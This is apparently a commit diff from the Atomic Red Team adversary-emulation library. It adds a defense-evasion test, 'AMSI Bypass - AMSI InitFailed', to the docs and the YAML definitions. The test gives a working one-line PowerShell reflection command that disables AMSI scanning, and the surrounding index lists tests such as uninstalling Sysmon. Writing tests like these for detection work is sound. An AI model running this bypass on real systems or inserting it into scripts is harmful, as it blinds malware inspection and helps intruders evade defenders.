Generate docs from job=validate_atomics_generate_docs branch=master

2019-09-17 18:33:39 +00:00
parent 26263baec9
commit d6d68477ac
4 changed files with 30 additions and 0 deletions
@@ -24,6 +24,8 @@

 - [Atomic Test #10 - Uninstall Sysmon](#atomic-test-10---uninstall-sysmon)

+- [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed)
+

 <br/>

@@ -236,4 +238,21 @@ sc query sysmon > nul
 sysmon -i -accepteula
 ```

+<br/>
+<br/>
+
+## Atomic Test #11 - AMSI Bypass - AMSI InitFailed
+Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. 
+https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! 
+```
+[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+```
+
+
+
 <br/>
@@ -193,6 +193,7 @@
  - Atomic Test #8: Unload Sysmon Filter Driver [windows]
  - Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
  - Atomic Test #10: Uninstall Sysmon [windows]
+  - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -6000,6 +6000,15 @@ defense-evasion:
        cleanup_command: 'sysmon -i -accepteula

 '
+    - name: AMSI Bypass - AMSI InitFailed
+      description: "Any easy way to bypass AMSI inspection is it patch the dll in
+        memory setting the \"amsiInitFailed\" function to true. \nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
  T1107:
    technique:
      external_references:
@@ -37,6 +37,7 @@
  - Atomic Test #8: Unload Sysmon Filter Driver [windows]
  - Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
  - Atomic Test #10: Uninstall Sysmon [windows]
+  - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)